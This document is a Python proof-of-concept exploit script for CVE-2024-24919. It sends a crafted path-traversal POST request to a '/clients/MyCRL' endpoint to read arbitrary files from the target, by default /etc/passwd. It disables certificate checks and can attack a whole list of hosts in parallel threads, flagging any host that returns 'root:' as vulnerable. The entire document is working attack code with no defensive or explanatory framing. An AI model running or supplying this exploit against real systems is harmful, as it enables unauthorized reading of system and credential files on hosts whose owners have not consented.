CVE-2024-24919.py

#!/usr/bin/python3

import requests
from argparse import ArgumentParser
from urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style
import re
from concurrent.futures import ThreadPoolExecutor, as_completed

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def is_valid_url(url):
    pattern = re.compile(
        r'^(https?://|http?://)?'
        r'((([0-9]{1,3}\.){3}[0-9]{1,3})|'
        r'(([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}))'
        r'(:[0-9]{1,5})?'
        r'(/.*)?$' 
    )
    return pattern.match(url) is not None

def ensure_scheme(url):
    if not re.match(r'^(https?://|http://)', url):
        return 'https://' + url
    return url

def exploit(target_url, path):
    target = f'{target_url}/clients/MyCRL'
    data = f'aCSHELL/../../../../../../../../../../..{path}'

    headers = {
        'Host': target_url,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Te': 'trailers',
        'Dnt': '1',
        'Connection': 'keep-alive',
        'Content-Length': '48'
    }

    try:
        response = requests.post(target, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            if 'root:' in response.text:
                print(Fore.GREEN + f"{target_url} VULNERABLE" + Style.RESET_ALL)
            print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"Error exploiting {target_url}: {e}")

def process_target(target, path):
    target = target.strip()
    if target:
        target = ensure_scheme(target)
        if is_valid_url(target):
            print(f'Exploiting {target}...')
            exploit(target, path)
        else:
            print(f"Invalid URL: {target}")

def main():
    parser = ArgumentParser(description='CVE-2024-24919 PoC')
    parser.add_argument('-i', '--ip', help='Target IP address or URL')
    parser.add_argument('-p', '--path', default='/etc/passwd', help='Path to read on the target system')
    parser.add_argument('-f', '--file', help='File containing list of IP addresses or URLs')
    parser.add_argument('-t', '--threads', type=int, default=4, help='Number of threads to use')

    args = parser.parse_args()

    if not args.ip and not args.file:
        parser.error("At least one of --ip or --file must be specified")

    targets = []
    if args.file:
        try:
            with open(args.file, 'r') as file:
                targets = file.readlines()
        except Exception as e:
            print(f"Error reading file: {e}")
            return

    if args.ip:
        targets.append(args.ip)

    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = [executor.submit(process_target, target, args.path) for target in targets]
        for future in as_completed(futures):
            future.result()

if __name__ == '__main__':
    main()